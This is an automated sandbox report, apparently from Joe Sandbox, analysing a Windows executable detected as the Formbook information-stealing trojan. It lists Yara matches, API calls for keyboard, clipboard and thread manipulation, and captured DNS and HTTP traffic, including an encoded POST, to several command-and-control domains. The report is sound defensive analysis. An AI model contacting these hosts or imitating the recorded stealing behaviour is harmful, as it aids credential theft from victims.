Windows Analysis Report
psibx9rXra.exe

AI detected suspicious sample

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: psibx9rXra.exe

Joe Sandbox ML: detected

Source: psibx9rXra.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GFwdSeXZEVUZM.exe, 00000004.00000002.3447028542.00000000008CE000.00000002.00000001.01000000.00000005.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3446773550.00000000008CE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: psibx9rXra.exe, 00000000.00000003.2193513593.0000000004240000.00000004.00001000.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2193144302.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2402494725.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400449383.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.0000000005300000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2559655792.0000000004F9B000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2561457724.000000000514C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.000000000549E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: psibx9rXra.exe, 00000000.00000003.2193513593.0000000004240000.00000004.00001000.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2193144302.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2402494725.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400449383.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.0000000005300000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2559655792.0000000004F9B000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2561457724.000000000514C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.000000000549E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: NewDev.pdbGCTL source: svchost.exe, 00000002.00000003.2463415655.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463536253.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463565816.000000000362A000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000002.3453208541.0000000001428000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NewDev.pdb source: svchost.exe, 00000002.00000003.2463415655.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463536253.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463565816.000000000362A000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000002.3453208541.0000000001428000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: newdev.exe, 00000005.00000002.3458200823.000000000592C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000030FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000373EC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: newdev.exe, 00000005.00000002.3458200823.000000000592C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000030FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000373EC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FE445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FE445A
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEC6D1 FindFirstFileW,FindClose,	0_2_00FEC6D1
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00FEC75C
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FEEF95
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FEF0F2
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FEF3F3
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FE37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FE37EF
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FE3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FE3B12
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FEBCBC

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.moritynomxd.xyz

Source: Joe Sandbox View	IP Address: 156.242.132.82 156.242.132.82
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74

Source: Joe Sandbox View

ASN Name: TEDRATEDRABACKBONEES TEDRATEDRABACKBONEES

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FF22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00FF22EE

Source: global traffic	HTTP traffic detected: GET /0uas/?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl76 HTTP/1.1Host: www.easestore.shopAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
Source: global traffic	HTTP traffic detected: GET /k4q2/?bxDtSjJ8=LBQI05KptpfuDcZW7JoIpuF74BnNKfAu333BOVzeV95OEtTp/i4HGB65IJHwn48sc6noL6ZERte3tTxWC6Id5pYWrwAdGl9yxaqIHeQzu/Ta2AAfF3von29M/1uaALX4Ci+P/fk=&zj=orBTgZEhYzzl76 HTTP/1.1Host: www.yu35n.topAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
Source: global traffic	HTTP traffic detected: GET /o5i7/?bxDtSjJ8=UzQqnnXvSc3Mr+9QcvCsHMvIJtyRJ1aQrLi0DBTwMAPqBtFAVrqfkCNp/R9/sDvSPASnyWuFHZLa9XQnO8xSKQTT8XEJ9CJbgwDafhDT3FMBtYtvONQCjms9TNvshXbs6vmRQiM=&zj=orBTgZEhYzzl76 HTTP/1.1Host: www.moritynomxd.xyzAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
Source: global traffic	HTTP traffic detected: GET /pjwm/?bxDtSjJ8=8dO1aKrXjPlkXvyCnyLGa4pnRyHZl/5Glqi2qmOCi9JNoYrB/H/4K5GJx7Vk3aBG8ot0fyIE2s8PLQIeBQda8ynm0peoT5yaFK2JmAGmcsEs6JHRTdV3uPo4ApQ0nSHi8A1Y4Yw=&zj=orBTgZEhYzzl76 HTTP/1.1Host: www.shanhaiguan.netAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)

Source: global traffic	DNS traffic detected: DNS query: www.easestore.shop
Source: global traffic	DNS traffic detected: DNS query: www.yu35n.top
Source: global traffic	DNS traffic detected: DNS query: www.moritynomxd.xyz
Source: global traffic	DNS traffic detected: DNS query: www.shanhaiguan.net
Source: global traffic	DNS traffic detected: DNS query: www.wearenotgoingback.info

Source: unknown

HTTP traffic detected: POST /k4q2/ HTTP/1.1Host: www.yu35n.topAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.yu35n.topReferer: http://www.yu35n.top/k4q2/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 213Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)Data Raw: 62 78 44 74 53 6a 4a 38 3d 47 44 34 6f 33 4d 75 50 2b 34 4b 38 43 76 52 61 32 39 77 34 31 75 5a 6b 76 6a 33 6d 65 64 70 51 33 57 72 4a 52 7a 75 38 51 62 6f 73 58 4c 62 67 2b 56 73 4d 43 43 69 2f 4e 70 76 4d 67 4c 6f 61 49 71 69 6f 44 2f 56 69 4c 74 72 69 37 78 64 72 56 70 6f 70 30 64 74 72 73 78 6f 64 46 78 46 2b 2b 34 32 6e 41 2b 64 36 7a 72 43 76 77 44 6b 78 46 32 66 4e 30 47 52 54 32 33 79 66 44 4a 6d 5a 4c 77 6d 48 79 2f 62 58 6c 71 63 55 32 35 61 48 4f 68 48 52 77 58 72 70 45 67 55 45 54 67 62 59 4c 4c 64 75 78 38 56 55 7a 34 46 75 42 30 47 4f 41 6d 55 66 7a 49 56 6f 6b 65 6d 69 6b 73 79 4c 79 58 48 33 5a 4e 73 68 52 56 2f 67 Data Ascii: bxDtSjJ8=GD4o3MuP+4K8CvRa29w41uZkvj3medpQ3WrJRzu8QbosXLbg+VsMCCi/NpvMgLoaIqioD/ViLtri7xdrVpop0dtrsxodFxF++42nA+d6zrCvwDkxF2fN0GRT23yfDJmZLwmHy/bXlqcU25aHOhHRwXrpEgUETgbYLLdux8VUz4FuB0GOAmUfzIVokemiksyLyXH3ZNshRV/g

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:09:56 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811755-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:09:59 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811755-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:10:01 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811755-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:10:04 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811755-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: GFwdSeXZEVUZM.exe, 00000007.00000002.3457739749.0000000005587000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shanhaiguan.net
Source: GFwdSeXZEVUZM.exe, 00000007.00000002.3457739749.0000000005587000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shanhaiguan.net/pjwm/
Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: newdev.exe, 00000005.00000002.3446964791.0000000003576000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: newdev.exe, 00000005.00000003.2745077473.0000000008319000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: newdev.exe, 00000005.00000002.3446964791.0000000003576000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: newdev.exe, 00000005.00000002.3446964791.000000000359C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: newdev.exe, 00000005.00000002.3458200823.0000000005D14000.00000004.10000000.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000034E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000377D4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.easestore.shop/0uas?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9o
Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FF4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00FF4164

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FF4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00FF4164

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FF3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00FF3F66

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FE001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00FE001C

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_0100CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0100CABC

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00F83B3A
Source: psibx9rXra.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: psibx9rXra.exe, 00000000.00000000.2183924631.0000000001034000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ae869402-7
Source: psibx9rXra.exe, 00000000.00000000.2183924631.0000000001034000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_6da90c36-3
Source: psibx9rXra.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7e64d5a6-f
Source: psibx9rXra.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e67baf40-5

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C743 NtClose,	2_2_0042C743
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72B60 NtClose,LdrInitializeThunk,	2_2_03C72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03C72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,	2_2_03C735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C74340 NtSetContextThread,	2_2_03C74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C74650 NtSuspendThread,	2_2_03C74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72BE0 NtQueryValueKey,	2_2_03C72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72BF0 NtAllocateVirtualMemory,	2_2_03C72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72B80 NtQueryInformationFile,	2_2_03C72B80
